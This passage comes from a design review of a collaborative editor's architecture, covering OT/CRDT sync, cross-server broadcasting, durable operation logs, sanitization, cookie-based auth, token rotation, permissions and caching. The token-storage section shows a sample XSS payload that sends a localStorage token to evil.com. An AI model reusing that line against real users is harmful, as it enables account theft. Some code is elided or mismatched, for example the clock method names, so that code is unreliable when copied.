// Insert operations go first
if (opA?.type === 'insert') {
aPrime.push(opA);
bPrime.push({ type: 'retain', count: opA.text.length });
opA = a[++indexA];
continue;
}
if (opB?.type === 'insert') {
bPrime.push(opB);
aPrime.push({ type: 'retain', count: opB.text.length });
opB = b[++indexB];
continue;
}
      // Both are retain or delete: split by the shorter length and emit
      // matching retain/delete pairs (full case analysis elided for brevity)
      break;
}
return [aPrime, bPrime];
}
// Apply operation to document
apply(ops: Operation[]): void {
let index = 0;
let newContent = '';
for (const op of ops) {
switch (op.type) {
case 'retain':
newContent += this.content.slice(index, index + op.count);
index += op.count;
break;
case 'insert':
newContent += op.text;
break;
case 'delete':
index += op.count;
break;
}
}
newContent += this.content.slice(index);
this.content = newContent;
this.revision++;
}
}
// Server-side OT handling
class OTServer {
private document: OTDocument;
private history: Operation[][] = [];
receiveOperation(clientRevision: number, ops: Operation[]): Operation[] {
// Transform against all operations that happened since client's revision
let transformedOps = ops;
for (let i = clientRevision; i < this.history.length; i++) {
const [newOps] = OTDocument.transform(transformedOps, this.history[i]);
transformedOps = newOps;
}
this.document.apply(transformedOps);
this.history.push(transformedOps);
return transformedOps;
}
}
Alternative: CRDTs (Conflict-free Replicated Data Types)
// Simplified RGA (Replicated Growable Array) CRDT for text
interface RGANode {
id: { timestamp: HLC; nodeId: string };
char: string | null; // null = tombstone (deleted)
parent: RGANode['id'] | null;
}
class RGADocument {
private nodes: Map<string, RGANode> = new Map();
  private clock: HybridLogicalClock;
  private nodeId: string;
  constructor(nodeId: string) {
    this.nodeId = nodeId;
    this.clock = new HybridLogicalClock(nodeId);
  }
  insert(position: number, char: string): RGANode {
    const parentId = this.getNodeAtPosition(position - 1)?.id ?? null;
    const node: RGANode = {
      id: { timestamp: this.clock.tick(), nodeId: this.nodeId },
char,
parent: parentId
};
this.nodes.set(this.nodeIdToString(node.id), node);
return node;
}
delete(position: number): void {
const node = this.getNodeAtPosition(position);
if (node) node.char = null; // Tombstone
}
merge(remoteNode: RGANode): void {
const key = this.nodeIdToString(remoteNode.id);
if (!this.nodes.has(key)) {
this.nodes.set(key, remoteNode);
this.clock.receive(remoteNode.id.timestamp);
}
}
getText(): string {
return this.getOrderedNodes()
.filter(n => n.char !== null)
.map(n => n.char)
.join('');
}
private nodeIdToString(id: RGANode['id']): string {
return `${id.timestamp.wallTime}-${id.timestamp.logical}-${id.nodeId}`;
}
private getOrderedNodes(): RGANode[] {
// Topological sort based on parent relationships
// with timestamp as tie-breaker
// ... implementation
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| OT | Compact operations, well-understood | Requires central server for ordering, complex transform functions |
| CRDT | Decentralized, works offline | Larger metadata overhead, tombstones accumulate |
| Last-write-wins | Simple | Loses data |
Recommendation: Use OT for real-time sync (like Google Docs does) with CRDT for offline support.
The Problem: With round-robin load balancing, users on the same document connect to different servers. Changes only broadcast to clients on the SAME server.
Document: "Project Proposal"
Server A: Server B:
├── Alice (editing) ├── Bob (editing)
└── Charlie (viewing) └── Diana (viewing)
Alice types "Hello" → Charlie sees it immediately
→ Bob and Diana wait up to 2 seconds (polling interval)
This creates a jarring, inconsistent experience where some users see real-time updates and others see delayed updates.
Solution: Redis Pub/Sub for Cross-Server Broadcasting
import Redis from 'ioredis';
import { WebSocket } from 'ws';
class DocumentSyncService {
private redisPub: Redis;
private redisSub: Redis;
private localClients: Map<string, Set<WebSocket>> = new Map();
private serverId: string;
constructor() {
this.serverId = crypto.randomUUID();
this.redisPub = new Redis(process.env.REDIS_URL);
this.redisSub = new Redis(process.env.REDIS_URL);
this.setupSubscriptions();
}
private setupSubscriptions(): void {
this.redisSub.psubscribe('doc:*', (err) => {
if (err) console.error('Failed to subscribe:', err);
});
this.redisSub.on('pmessage', (pattern, channel, message) => {
const documentId = channel.replace('doc:', '');
const parsed = JSON.parse(message);
// Don't re-broadcast our own messages
if (parsed.serverId === this.serverId) return;
this.broadcastToLocalClients(documentId, parsed.payload);
});
}
async publishChange(documentId: string, change: DocumentChange): Promise<void> {
const message = JSON.stringify({
serverId: this.serverId,
payload: change,
timestamp: Date.now()
});
// Publish to Redis for other servers
await this.redisPub.publish(`doc:${documentId}`, message);
// Also broadcast to local clients
this.broadcastToLocalClients(documentId, change);
}
private broadcastToLocalClients(documentId: string, change: DocumentChange): void {
const clients = this.localClients.get(documentId);
if (!clients) return;
const message = JSON.stringify(change);
for (const client of clients) {
if (client.readyState === WebSocket.OPEN) {
client.send(message);
}
}
}
registerClient(documentId: string, ws: WebSocket): void {
if (!this.localClients.has(documentId)) {
this.localClients.set(documentId, new Set());
}
this.localClients.get(documentId)!.add(ws);
ws.on('close', () => {
this.localClients.get(documentId)?.delete(ws);
});
}
}
Alternative: Sticky Sessions with Consistent Hashing
// Nginx configuration for sticky sessions based on document ID
/*
upstream api_servers {
hash $arg_documentId consistent;
server api1:3000;
server api2:3000;
server api3:3000;
}
*/
// Or implement in application load balancer
class DocumentAwareLoadBalancer {
private servers: string[];
private hashRing: ConsistentHashRing;
constructor(servers: string[]) {
this.servers = servers;
this.hashRing = new ConsistentHashRing(servers, 150); // 150 virtual nodes
}
getServerForDocument(documentId: string): string {
return this.hashRing.getNode(documentId);
}
// Handle server failures gracefully
removeServer(server: string): void {
this.hashRing.removeNode(server);
// Clients will reconnect and get routed to new server
}
}
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Redis Pub/Sub | Decoupled servers, any server can handle any doc | Additional infrastructure, Redis becomes SPOF |
| Sticky sessions | Simpler, no cross-server communication | Uneven load, complex failover |
| Dedicated doc servers | Best performance per document | Complex routing, underutilization |
The Problem: Even with Redis Pub/Sub in place, the architecture keeps polling PostgreSQL every 2 seconds as a fallback, which adds redundant database load and a second, slower delivery path.
Solution: Event-Driven Architecture with PostgreSQL LISTEN/NOTIFY
import { Pool, Client } from 'pg';
class PostgresChangeNotifier {
private listenerClient: Client;
private pool: Pool;
private handlers: Map<string, Set<(change: any) => void>> = new Map();
async initialize(): Promise<void> {
this.listenerClient = new Client({ connectionString: process.env.DATABASE_URL });
await this.listenerClient.connect();
await this.listenerClient.query('LISTEN document_changes');
this.listenerClient.on('notification', (msg) => {
if (msg.channel === 'document_changes' && msg.payload) {
const change = JSON.parse(msg.payload);
this.notifyHandlers(change.document_id, change);
}
});
}
subscribe(documentId: string, handler: (change: any) => void): () => void {
if (!this.handlers.has(documentId)) {
this.handlers.set(documentId, new Set());
}
this.handlers.get(documentId)!.add(handler);
// Return unsubscribe function
return () => {
this.handlers.get(documentId)?.delete(handler);
};
}
private notifyHandlers(documentId: string, change: any): void {
const handlers = this.handlers.get(documentId);
if (handlers) {
for (const handler of handlers) {
handler(change);
}
}
}
}
// Database trigger to send notifications
/*
CREATE OR REPLACE FUNCTION notify_document_change()
RETURNS TRIGGER AS $$
BEGIN
PERFORM pg_notify(
'document_changes',
json_build_object(
'document_id', NEW.document_id,
'operation_id', NEW.id,
'operation', NEW.operation,
'revision', NEW.revision
)::text
);
RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER document_change_trigger
AFTER INSERT ON document_operations
FOR EACH ROW EXECUTE FUNCTION notify_document_change();
*/
The Problem: If a server crashes, up to 30 seconds of work is lost. For a real-time editor, this is catastrophic.
Timeline:
00:00 - Snapshot saved
00:15 - Alice types 500 words
00:29 - Server crashes
00:30 - Server restarts
Result: Alice's 500 words are gone forever
Solution: Operation Log with Periodic Compaction
interface DocumentOperation {
id: string;
documentId: string;
userId: string;
revision: number;
operation: Operation[]; // OT operations
timestamp: HLC;
checksum: string;
}
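The `timestamp: HLC` field above assumes a Hybrid Logical Clock, which replaces the original design's raw client timestamps: causally later events always compare later, even when wall clocks disagree. A minimal sketch (field names are illustrative):

```typescript
// Minimal Hybrid Logical Clock: physical time plus a logical counter.
// Unlike raw client timestamps, HLC timestamps are monotonic per node
// and respect causality across nodes even under clock skew.
interface HLC {
  wallTime: number; // milliseconds since epoch
  logical: number;  // tie-breaker counter within one millisecond
}

class HybridLogicalClock {
  private last: HLC = { wallTime: 0, logical: 0 };

  // Called when this node produces an event
  now(): HLC {
    const physical = Date.now();
    if (physical > this.last.wallTime) {
      this.last = { wallTime: physical, logical: 0 };
    } else {
      // Clock stalled or went backwards: bump the logical counter
      this.last = { wallTime: this.last.wallTime, logical: this.last.logical + 1 };
    }
    return { ...this.last };
  }

  // Called when receiving a remote timestamp; merges it into local state
  update(remote: HLC): HLC {
    const physical = Date.now();
    const maxWall = Math.max(physical, this.last.wallTime, remote.wallTime);
    let logical = 0;
    if (maxWall === this.last.wallTime && maxWall === remote.wallTime) {
      logical = Math.max(this.last.logical, remote.logical) + 1;
    } else if (maxWall === this.last.wallTime) {
      logical = this.last.logical + 1;
    } else if (maxWall === remote.wallTime) {
      logical = remote.logical + 1;
    }
    this.last = { wallTime: maxWall, logical };
    return { ...this.last };
  }

  static compare(a: HLC, b: HLC): number {
    return a.wallTime !== b.wallTime ? a.wallTime - b.wallTime : a.logical - b.logical;
  }
}
```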
class DurableDocumentStore {
private pool: Pool;
private redis: Redis;
async applyOperation(op: DocumentOperation): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// 1. Append to operation log (durable)
await client.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ($1, $2, $3, $4, $5, $6, $7)
`, [op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), op.timestamp, op.checksum]);
// 2. Update materialized view (for fast reads)
await client.query(`
UPDATE documents
SET current_revision = $1,
last_modified = NOW(),
content = apply_operation(content, $2)
WHERE id = $3 AND current_revision = $4
`, [op.revision, JSON.stringify(op.operation), op.documentId, op.revision - 1]);
await client.query('COMMIT');
// 3. Cache in Redis for real-time sync
await this.redis.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '10000', // Keep last ~10k operations
'*',
'data', JSON.stringify(op)
);
} catch (error) {
await client.query('ROLLBACK');
throw error;
} finally {
client.release();
}
}
// Periodic compaction job
async compactDocument(documentId: string): Promise<void> {
const client = await this.pool.connect();
try {
await client.query('BEGIN');
// Get current state
const { rows: [doc] } = await client.query(
'SELECT content, current_revision FROM documents WHERE id = $1 FOR UPDATE',
[documentId]
);
// Create snapshot
await client.query(`
INSERT INTO document_snapshots (document_id, revision, content, created_at)
VALUES ($1, $2, $3, NOW())
`, [documentId, doc.current_revision, doc.content]);
// Delete old operations (keep last 1000 for undo history)
await client.query(`
DELETE FROM document_operations
WHERE document_id = $1
AND revision < $2 - 1000
`, [documentId, doc.current_revision]);
await client.query('COMMIT');
} finally {
client.release();
}
}
// Recover document from operations
async recoverDocument(documentId: string): Promise<string> {
// Find latest snapshot
const { rows: [snapshot] } = await this.pool.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
let content = snapshot?.content ?? '';
let fromRevision = snapshot?.revision ?? 0;
// Apply all operations since snapshot
const { rows: operations } = await this.pool.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
for (const op of operations) {
// node-postgres returns JSONB columns already parsed, so no JSON.parse here
content = applyOperation(content, op.operation);
}
return content;
}
}
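`recoverDocument` (and the `apply_operation` SQL function above) assume an operation-application helper. A minimal sketch for a plain-text document with retain/insert/delete components; real OT libraries define richer operation types:

```typescript
// Sketch of the applyOperation(content, ops) helper assumed above,
// for plain text and the classic retain/insert/delete components.
type OpComponent =
  | { retain: number }   // copy N characters from the source
  | { insert: string }   // add new text at the cursor
  | { delete: number };  // skip N characters from the source

function applyOperation(content: string, ops: OpComponent[]): string {
  let cursor = 0;
  let result = '';
  for (const op of ops) {
    if ('retain' in op) {
      result += content.slice(cursor, cursor + op.retain);
      cursor += op.retain;
    } else if ('insert' in op) {
      result += op.insert;
    } else {
      cursor += op.delete; // deleted characters are simply not copied
    }
  }
  // Keep any trailing text the operation did not touch
  return result + content.slice(cursor);
}
```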
Database Schema:
-- Immutable operation log
CREATE TABLE document_operations (
id UUID PRIMARY KEY,
document_id UUID NOT NULL REFERENCES documents(id),
user_id UUID NOT NULL REFERENCES users(id),
revision BIGINT NOT NULL,
operation JSONB NOT NULL,
timestamp JSONB NOT NULL, -- HLC
checksum VARCHAR(64) NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Index for efficient replay
CREATE INDEX idx_doc_ops_replay
ON document_operations(document_id, revision);
-- Periodic snapshots for fast recovery
CREATE TABLE document_snapshots (
id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
document_id UUID NOT NULL REFERENCES documents(id),
revision BIGINT NOT NULL,
content TEXT NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision)
);
-- Materialized current state (for fast reads)
CREATE TABLE documents (
id UUID PRIMARY KEY,
title VARCHAR(500),
content TEXT,
current_revision BIGINT DEFAULT 0,
created_at TIMESTAMPTZ DEFAULT NOW(),
last_modified TIMESTAMPTZ DEFAULT NOW()
);
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| Operation log | Zero data loss, full history | Storage grows, need compaction |
| Frequent snapshots | Simple recovery | Still some data loss window |
| Write-ahead log | Database handles durability | Tied to specific database |
The Problem: Documents are stored as full HTML snapshots. User-controlled markup flows straight into storage and back out to every collaborator's browser (a stored-XSS vector), and an opaque HTML blob gives the sync layer nothing finer than the whole document to diff, merge, or conflict-resolve.
Solution: Structured Document Model with Delta Storage
// Structured document model (similar to ProseMirror/Slate)
interface DocumentNode {
type: 'doc' | 'paragraph' | 'heading' | 'list' | 'listItem' | 'text';
content?: DocumentNode[];
text?: string;
marks?: Mark[]; // bold, italic, link, etc.
attrs?: Record<string, any>;
}
interface Mark {
type: 'bold' | 'italic' | 'underline' | 'link' | 'code';
attrs?: Record<string, any>;
}
// Example document
const exampleDoc: DocumentNode = {
type: 'doc',
content: [
{
type: 'heading',
attrs: { level: 1 },
content: [{ type: 'text', text: 'My Document' }]
},
{
type: 'paragraph',
content: [
{ type: 'text', text: 'Hello ' },
{ type: 'text', text: 'world', marks: [{ type: 'bold' }] }
]
}
]
};
// Sanitization on input
class DocumentSanitizer {
private allowedNodeTypes = new Set([
'doc', 'paragraph', 'heading', 'list', 'listItem', 'text',
'blockquote', 'codeBlock', 'image', 'table', 'tableRow', 'tableCell'
]);
private allowedMarks = new Set([
'bold', 'italic', 'underline', 'strike', 'code', 'link'
]);
sanitize(node: DocumentNode): DocumentNode {
if (!this.allowedNodeTypes.has(node.type)) {
// Convert unknown types to paragraph
return { type: 'paragraph', content: this.sanitizeContent(node.content) };
}
return {
type: node.type,
...(node.text && { text: this.sanitizeText(node.text) }),
...(node.content && { content: this.sanitizeContent(node.content) }),
...(node.marks && { marks: this.sanitizeMarks(node.marks) }),
...(node.attrs && { attrs: this.sanitizeAttrs(node.type, node.attrs) })
};
}
private sanitizeText(text: string): string {
// Remove any potential script injections
return text.replace(/<[^>]*>/g, '');
}
private sanitizeMarks(marks: Mark[]): Mark[] {
return marks
.filter(m => this.allowedMarks.has(m.type))
.map(m => {
// 'link' is a mark, not a node type, so its href must be checked here
if (m.type === 'link' && typeof m.attrs?.href === 'string' && /^https?:\/\//.test(m.attrs.href)) {
return { type: m.type, attrs: { href: m.attrs.href } };
}
return { type: m.type };
});
}
private sanitizeContent(content?: DocumentNode[]): DocumentNode[] {
return (content ?? []).map(n => this.sanitize(n));
}
private sanitizeAttrs(nodeType: string, attrs: Record<string, any>): Record<string, any> {
const sanitized: Record<string, any> = {};
switch (nodeType) {
case 'heading':
sanitized.level = Math.min(6, Math.max(1, parseInt(attrs.level) || 1));
break;
case 'link':
// Only allow safe URL schemes
if (attrs.href && /^https?:\/\//.test(attrs.href)) {
sanitized.href = attrs.href;
}
break;
case 'image':
if (attrs.src && /^https?:\/\//.test(attrs.src)) {
sanitized.src = attrs.src;
sanitized.alt = String(attrs.alt || '').slice(0, 500);
}
break;
}
return sanitized;
}
}
// Render to HTML only on output
class DocumentRenderer {
render(node: DocumentNode): string {
switch (node.type) {
case 'doc':
return node.content?.map(n => this.render(n)).join('') ?? '';
case 'paragraph':
return `<p>${this.renderContent(node)}</p>`;
case 'heading':
const level = node.attrs?.level ?? 1;
return `<h${level}>${this.renderContent(node)}</h${level}>`;
case 'text':
let text = this.escapeHtml(node.text ?? '');
for (const mark of node.marks ?? []) {
text = this.applyMark(text, mark);
}
return text;
default:
return this.renderContent(node);
}
}
private renderContent(node: DocumentNode): string {
return node.content?.map(n => this.render(n)).join('') ?? '';
}
private escapeHtml(text: string): string {
return text
.replace(/&/g, '&amp;')
.replace(/</g, '&lt;')
.replace(/>/g, '&gt;')
.replace(/"/g, '&quot;');
}
private applyMark(text: string, mark: Mark): string {
switch (mark.type) {
case 'bold': return `<strong>${text}</strong>`;
case 'italic': return `<em>${text}</em>`;
case 'code': return `<code>${text}</code>`;
case 'link': return `<a href="${this.escapeHtml(mark.attrs?.href ?? '')}">${text}</a>`;
default: return text;
}
}
}
The Problem: Any XSS vulnerability (from user content, third-party scripts, browser extensions) can steal tokens.
// Attacker's XSS payload
fetch('https://evil.com/steal', {
method: 'POST',
body: localStorage.getItem('token')
});
// Attacker now has 24-hour access to victim's account
Solution: HTTP-Only Cookies with Proper Security Flags
// Server-side: Set secure cookies
import { Response } from 'express';
class AuthService {
setAuthCookies(res: Response, tokens: { accessToken: string; refreshToken: string }): void {
// Access token - short lived, used for API calls
res.cookie('access_token', tokens.accessToken, {
httpOnly: true, // Not accessible via JavaScript
secure: true, // HTTPS only
sameSite: 'strict', // CSRF protection
maxAge: 15 * 60 * 1000, // 15 minutes
path: '/api' // Only sent to API routes
});
// Refresh token - longer lived, only sent to refresh endpoint
res.cookie('refresh_token', tokens.refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000, // 7 days
path: '/api/auth/refresh' // Only sent to refresh endpoint
});
// CSRF token - readable by JavaScript, verified on state-changing requests
const csrfToken = crypto.randomBytes(32).toString('hex');
res.cookie('csrf_token', csrfToken, {
httpOnly: false, // Readable by JavaScript
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
}
}
// Middleware to verify CSRF token
function csrfProtection(req: Request, res: Response, next: NextFunction): void {
if (['POST', 'PUT', 'DELETE', 'PATCH'].includes(req.method)) {
const cookieToken = req.cookies.csrf_token;
const headerToken = req.headers['x-csrf-token'];
if (!cookieToken || !headerToken || cookieToken !== headerToken) {
return res.status(403).json({ error: 'Invalid CSRF token' });
}
}
next();
}
// Client-side: Include CSRF token in requests
class ApiClient {
private getCsrfToken(): string {
return document.cookie
.split('; ')
.find(row => row.startsWith('csrf_token='))
?.split('=')[1] ?? '';
}
async request(url: string, options: RequestInit = {}): Promise<Response> {
return fetch(url, {
...options,
credentials: 'include', // Include cookies
headers: {
...options.headers,
'X-CSRF-Token': this.getCsrfToken()
}
});
}
}
WebSocket Authentication:
// WebSocket connections need special handling since they don't send cookies automatically
class SecureWebSocketServer {
handleUpgrade(request: IncomingMessage, socket: Socket, head: Buffer): void {
// Option 1: Verify cookie on upgrade
const cookies = this.parseCookies(request.headers.cookie ?? '');
const accessToken = cookies.access_token;
try {
const payload = this.verifyToken(accessToken);
this.wss.handleUpgrade(request, socket, head, (ws) => {
(ws as any).userId = payload.userId;
this.wss.emit('connection', ws, request);
});
} catch (error) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
}
// Option 2: Ticket-based authentication
async generateWebSocketTicket(userId: string): Promise<string> {
const ticket = crypto.randomBytes(32).toString('hex');
// Store ticket with short expiry
await this.redis.setex(`ws_ticket:${ticket}`, 30, userId);
return ticket;
}
async validateTicket(ticket: string): Promise<string | null> {
const userId = await this.redis.get(`ws_ticket:${ticket}`);
if (userId) {
await this.redis.del(`ws_ticket:${ticket}`); // One-time use
}
return userId;
}
}
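On the client, the ticket flow reduces to two steps: request a one-time ticket over the authenticated (cookie-carrying) HTTP session, then put it in the connection URL. A small sketch of the URL construction; the endpoint path and parameter names here are assumptions, not a fixed API:

```typescript
// Hypothetical client-side helper for ticket-based WebSocket auth.
// Flow: POST /api/auth/ws-ticket (cookie-authenticated) -> { ticket } ->
// open wss://.../ws?documentId=...&ticket=...; the server validates and
// deletes the ticket on upgrade, so a leaked URL cannot be replayed.
function buildWsUrl(base: string, documentId: string, ticket: string): string {
  const url = new URL(base);
  url.searchParams.set('documentId', documentId);
  url.searchParams.set('ticket', ticket);
  return url.toString();
}
```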
Trade-offs:
| Approach | Pros | Cons |
|---|---|---|
| HTTP-only cookies | XSS-resistant | Need CSRF protection, more complex |
| localStorage + fingerprinting | Simpler | Vulnerable to XSS |
| Session IDs only | Most secure | Requires server-side session store |
The Problem: If a token is compromised, the attacker has 24 hours of access. For a document editor with sensitive content, this is too risky.
Solution: Short-Lived Access Tokens with Refresh Token Rotation
class TokenService {
private readonly ACCESS_TOKEN_EXPIRY = '15m';
private readonly REFRESH_TOKEN_EXPIRY = '7d';
async generateTokenPair(userId: string): Promise<TokenPair> {
const tokenFamily = crypto.randomUUID();
const accessToken = jwt.sign(
{ userId, type: 'access' },
process.env.JWT_SECRET!,
{ expiresIn: this.ACCESS_TOKEN_EXPIRY }
);
const refreshToken = jwt.sign(
{ userId, type: 'refresh', family: tokenFamily },
process.env.JWT_REFRESH_SECRET!,
{ expiresIn: this.REFRESH_TOKEN_EXPIRY }
);
// Store refresh token hash for revocation
await this.redis.setex(
`refresh:${tokenFamily}`,
7 * 24 * 60 * 60,
JSON.stringify({
userId,
tokenHash: this.hashToken(refreshToken),
createdAt: Date.now()
})
);
return { accessToken, refreshToken };
}
async refreshTokens(refreshToken: string): Promise<TokenPair | null> {
try {
const payload = jwt.verify(refreshToken, process.env.JWT_REFRESH_SECRET!) as any;
// Check if token family is still valid
const storedData = await this.redis.get(`refresh:${payload.family}`);
if (!storedData) {
// Token family was revoked - possible token theft!
await this.revokeAllUserSessions(payload.userId);
return null;
}
const stored = JSON.parse(storedData);
// Verify token hash matches
if (stored.tokenHash !== this.hashToken(refreshToken)) {
// Token reuse detected - revoke family
await this.redis.del(`refresh:${payload.family}`);
await this.revokeAllUserSessions(payload.userId);
return null;
}
// Generate new token pair (rotation)
const newTokens = await this.generateTokenPair(payload.userId);
// Invalidate old family
await this.redis.del(`refresh:${payload.family}`);
return newTokens;
} catch (error) {
return null;
}
}
private hashToken(token: string): string {
return crypto.createHash('sha256').update(token).digest('hex');
}
async revokeAllUserSessions(userId: string): Promise<void> {
// In production, use a more efficient approach with user-specific key patterns
const keys = await this.redis.keys('refresh:*');
for (const key of keys) {
const data = await this.redis.get(key);
if (data && JSON.parse(data).userId === userId) {
await this.redis.del(key);
}
}
}
}
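The `redis.keys('refresh:*')` scan in `revokeAllUserSessions` touches every refresh token in the system. The "more efficient approach" the comment alludes to is usually a per-user index: a Redis set of the user's token families, so revocation costs O(user's sessions). A sketch, assuming an ioredis-style client (key names are illustrative):

```typescript
// Sketch: index each user's refresh-token families in a Redis set so
// revoking all sessions is O(user's sessions), not a global KEYS scan.
class SessionIndex {
  constructor(private redis: {
    sadd(key: string, member: string): Promise<number>;
    smembers(key: string): Promise<string[]>;
    del(...keys: string[]): Promise<number>;
    expire(key: string, seconds: number): Promise<number>;
  }) {}

  // Call alongside generateTokenPair()
  async trackSession(userId: string, tokenFamily: string): Promise<void> {
    await this.redis.sadd(`user_sessions:${userId}`, tokenFamily);
    // Keep the index from outliving the longest-lived refresh token
    await this.redis.expire(`user_sessions:${userId}`, 7 * 24 * 60 * 60);
  }

  async revokeAll(userId: string): Promise<void> {
    const families = await this.redis.smembers(`user_sessions:${userId}`);
    if (families.length > 0) {
      await this.redis.del(...families.map(f => `refresh:${f}`));
    }
    await this.redis.del(`user_sessions:${userId}`);
  }
}
```

The trade-off is one extra write per login and the possibility of stale set members (families that already expired), which `del` handles harmlessly.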
The Problem: The architecture doesn't mention access control. Can any authenticated user access any document?
Solution: Document Permission System
enum Permission {
VIEW = 'view',
COMMENT = 'comment',
EDIT = 'edit',
ADMIN = 'admin'
}
interface DocumentAccess {
documentId: string;
principalType: 'user' | 'group' | 'organization' | 'public';
principalId: string | null; // null for public
permission: Permission;
}
class DocumentAuthorizationService {
private cache: Redis;
private pool: Pool;
async checkPermission(
userId: string,
documentId: string,
requiredPermission: Permission
): Promise<boolean> {
// Check cache first
const cacheKey = `authz:${userId}:${documentId}`;
const cached = await this.cache.get(cacheKey);
if (cached) {
return this.permissionSatisfies(cached as Permission, requiredPermission);
}
// Query database
const effectivePermission = await this.getEffectivePermission(userId, documentId);
// Cache for 5 minutes
if (effectivePermission) {
await this.cache.setex(cacheKey, 300, effectivePermission);
}
return this.permissionSatisfies(effectivePermission, requiredPermission);
}
private async getEffectivePermission(
userId: string,
documentId: string
): Promise<Permission | null> {
const { rows } = await this.pool.query(`
WITH user_groups AS (
SELECT group_id FROM group_members WHERE user_id = $1
),
user_org AS (
SELECT organization_id FROM users WHERE id = $1
)
SELECT permission FROM document_access
WHERE document_id = $2
AND (
(principal_type = 'user' AND principal_id = $1)
OR (principal_type = 'group' AND principal_id IN (SELECT group_id FROM user_groups))
OR (principal_type = 'organization' AND principal_id = (SELECT organization_id FROM user_org))
OR (principal_type = 'public')
)
ORDER BY
CASE permission
WHEN 'admin' THEN 4
WHEN 'edit' THEN 3
WHEN 'comment' THEN 2
WHEN 'view' THEN 1
END DESC
LIMIT 1
`, [userId, documentId]);
return rows[0]?.permission ?? null;
}
private permissionSatisfies(has: Permission | null, needs: Permission): boolean {
if (!has) return false;
const hierarchy: Record<Permission, number> = {
[Permission.VIEW]: 1,
[Permission.COMMENT]: 2,
[Permission.EDIT]: 3,
[Permission.ADMIN]: 4
};
return hierarchy[has] >= hierarchy[needs];
}
// Invalidate cache when permissions change
async invalidateDocumentCache(documentId: string): Promise<void> {
const keys = await this.cache.keys(`authz:*:${documentId}`);
if (keys.length > 0) {
await this.cache.del(...keys);
}
}
}
// Middleware
function requirePermission(permission: Permission) {
return async (req: Request, res: Response, next: NextFunction) => {
const { documentId } = req.params;
const userId = req.user!.id;
const hasPermission = await authzService.checkPermission(
userId,
documentId,
permission
);
if (!hasPermission) {
return res.status(403).json({ error: 'Insufficient permissions' });
}
next();
};
}
// Usage
app.get('/api/documents/:documentId', requirePermission(Permission.VIEW), getDocument);
app.put('/api/documents/:documentId', requirePermission(Permission.EDIT), updateDocument);
app.delete('/api/documents/:documentId', requirePermission(Permission.ADMIN), deleteDocument);
The Problem: Caching API responses for collaborative documents is fundamentally broken:
10:00:00 - Alice requests document, CDN caches response
10:00:30 - Bob edits document
10:04:59 - Alice requests document again, gets stale cached version
Alice sees version from 5 minutes ago!
Solution: Proper Cache Control Headers
class CacheControlMiddleware {
// Never cache document content or real-time data
static noCache(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'no-store, no-cache, must-revalidate, proxy-revalidate',
'Pragma': 'no-cache',
'Expires': '0',
'Surrogate-Control': 'no-store'
});
next();
}
// Cache static assets aggressively
static staticAssets(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=31536000, immutable'
});
next();
}
// Cache user-specific data privately with revalidation
static privateWithRevalidation(maxAge: number) {
return (req: Request, res: Response, next: NextFunction) => {
res.set({
'Cache-Control': `private, max-age=${maxAge}, must-revalidate`,
'Vary': 'Authorization, Cookie'
});
next();
};
}
// Cache public data with ETag validation
static publicWithEtag(req: Request, res: Response, next: NextFunction): void {
res.set({
'Cache-Control': 'public, max-age=0, must-revalidate',
'Vary': 'Accept-Encoding'
});
next();
}
}
// Apply to routes
app.use('/api/documents/:id/content', CacheControlMiddleware.noCache);
app.use('/api/documents/:id/operations', CacheControlMiddleware.noCache);
app.use('/api/users/me', CacheControlMiddleware.privateWithRevalidation(60));
app.use('/api/documents', CacheControlMiddleware.publicWithEtag); // List with ETags
app.use('/static', CacheControlMiddleware.staticAssets);
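The `publicWithEtag` middleware above only sets cache headers; actually answering with `304 Not Modified` requires computing a tag for the response body and comparing it to the client's `If-None-Match`. A framework-agnostic sketch of those two steps (the truncated-SHA-256 tag format is an arbitrary choice):

```typescript
import { createHash } from 'crypto';

// Compute a strong ETag for a response body. Any stable digest works;
// truncated SHA-256 in quotes is just one reasonable format.
function computeEtag(body: string): string {
  return '"' + createHash('sha256').update(body).digest('hex').slice(0, 16) + '"';
}

// Decide whether the client's cached copy is still valid: if the tags
// match, the server can reply 304 with an empty body.
function canServe304(ifNoneMatch: string | undefined, etag: string): boolean {
  return ifNoneMatch !== undefined && ifNoneMatch === etag;
}
```

In an Express handler this pairs with `res.set('ETag', etag)` on the 200 path and `res.status(304).end()` when `canServe304` returns true.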
What CAN be cached:
// Safe to cache:
// 1. Static assets (JS, CSS, images) - with content hash in filename
// 2. User profile data - short TTL, private
// 3. Document metadata (title, last modified) - with ETag validation
// 4. Organization/team data - short TTL
// CloudFront configuration
const cloudFrontBehaviors = {
'/static/*': {
TTL: 31536000, // 1 year
compress: true,
headers: ['Origin']
},
'/api/documents/*/content': {
TTL: 0, // Never cache
forwardCookies: 'all',
forwardHeaders: ['Authorization']
},
'/api/*': {
TTL: 0,
forwardCookies: 'all',
forwardHeaders: ['Authorization', 'X-CSRF-Token']
}
};
The Problem: Using PostgreSQL for real-time sync creates:
100 users typing at 5 chars/second = 500 writes/second
1000 users = 5000 writes/second
PostgreSQL will struggle, and latency will spike
Solution: Tiered Storage Architecture
class TieredDocumentStorage {
private redis: Redis;
private pool: Pool;
private operationBuffer: Map<string, DocumentOperation[]> = new Map();
private flushInterval: NodeJS.Timeout;
constructor() {
